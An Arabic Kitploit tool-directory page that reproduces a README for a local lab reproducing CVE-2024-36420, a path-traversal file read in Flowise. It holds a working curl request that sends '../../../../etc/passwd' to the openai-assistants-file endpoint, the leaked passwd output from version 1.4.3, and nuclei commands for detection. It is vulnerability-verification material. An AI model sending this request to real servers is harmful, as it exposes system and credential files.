Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC_CVE-2024-36420 — POC_CVE-2024-36420 | Kitploit
أدوات/GitHubGitHub/fineman999/poc_cve-2024-36420
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائيالتعلم والتعليممختبرات وتدريب عملي
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

POC_CVE-2024-36420

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

POC_CVE-2024-36420

مختبر محلي لإعادة الإنتاج ومسودة قالب nuclei لثغرة CVE-2024-36420 المؤثرة على Flowise.

ملخص

CVE-2024-36420 هي ثغرة قراءة ملفات تعسفية في Flowise ناتجة عن الاستخدام غير المعقّم لمعامل جسم الطلب fileName في:

  • POST /api/v1/openai-assistants-file

استُخدم هذا المختبر للتحقق من:

  • السلوك الضعيف على flowiseai/flowise:1.4.3
  • السلوك المرفوض على الإصدار الأحدث flowiseai/flowise:3.1.2

المراجع

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

الملفات

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

اختبار النسخة الضعيفة

شغّل Flowise 1.4.3:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

التحقق اليدوي:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

الاستجابة الضعيفة المرصودة:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

اختبار الإصدار الأحدث

شغّل Flowise الأحدث 3.1.2:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

التحقق اليدوي:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

الاستجابة المرصودة على الإصدار الأحدث:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

تحقق من صحة القالب:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

شغّله ضد الهدف الضعيف:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

السلوك المتوقع:

  • 1.4.3: تطابق
  • 3.1.2: لا يوجد تطابق

ملاحظات

  • فجوة الإصدار مقبولة لأن هذا المستودع يوثّق فقط السلوك المرصود:
    • ضعيف على 1.4.3
    • مرفوض على 3.1.2
  • لا يدّعي تحديد الحد الدقيق لإصدار التصحيح.
  • لم تُستخدم أي أهداف حقيقية.
تنزيل الأداة